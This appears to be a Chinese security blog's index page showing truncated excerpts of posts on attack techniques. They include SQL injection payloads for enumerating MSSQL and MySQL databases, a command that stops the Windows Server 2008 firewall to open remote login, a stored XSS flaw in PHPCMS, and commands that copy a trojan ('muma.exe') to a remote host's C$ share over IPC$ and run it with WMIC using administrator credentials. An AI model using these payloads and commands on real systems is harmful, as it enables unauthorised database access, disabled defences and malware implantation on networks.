mssql注入全解

2017-5-12 / 0评

数据库基本信息获取 and 1=(select @@version)    获取数据库版本信息 and 1=(select db_name())    获取当前数据库名称 用户数据库名称获取 获取第一个用户数据库名称 and 1=(select top 1 name from master..sy...

mysql暴库总结

2017-5-12 / 0评

1.判断版本 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询 2.猜解字段数目, 用order by也可以猜, 也可以用union select一个一个的猜解 and 2=4 unio...

Windows Server 2008 停止防火墙命令

2017-5-12 / 0评

Win08+ 防火墙服务名为mpssvc,想停掉防火墙远程登录一般运行如下命令: C:\Windows\system32>net stop mpssvc Windows Firewall 服务正在停止. Windows Firewall 服务已成功停止。 但是在08里 直接停止防火墙的服务后...

PHPCMS储存XSS,指哪儿打哪儿

2017-5-12 / 0评

最近在学PHP,学了几天的PHP以后又来看了一下PHPCMS,代码审计一下吧。。还是一点也看不懂(额废话才学 几天PHP就想代码审计了?打死。。),唉苦逼的孩纸不会审计真蛋疼,那就黑盒再来看一遍吧,结果真的就又被我找到了一个,哈哈,存在XSS的地方在会员 中心--商务中心--商家资料--基本信息--经营地址那里,本来是想demo演示来着,但是由于实在商务中心...

常用的渗透测试工具型网站

2017-5-12 / 0评

NaviSec 网址: http://navisec.it 网络安全人员的上网导航,安全人员必备网站。网站专注内容,并没有太多的装饰,风格极为简洁。常去的论坛、漏洞库、知名博客、应急响应中心,应有尽有。之前,一直苦于没有一个网站能将常见的安全网站收集在一起。 navisec 的出现使编者备感惊喜。 ...

内网IPC$种马的三种方法

2017-5-12 / 0评

copy muma.exe \\host\c$\windows\temp\foobar.exe     ##IPC拷贝木马文件   WMIC远程运行命令 wmic /node:host /user:administrator /p 密码 process call c...

你好世界!

2017-5-4 / 0评

你好世界!阅读全文>>

1 2 3 4 5 6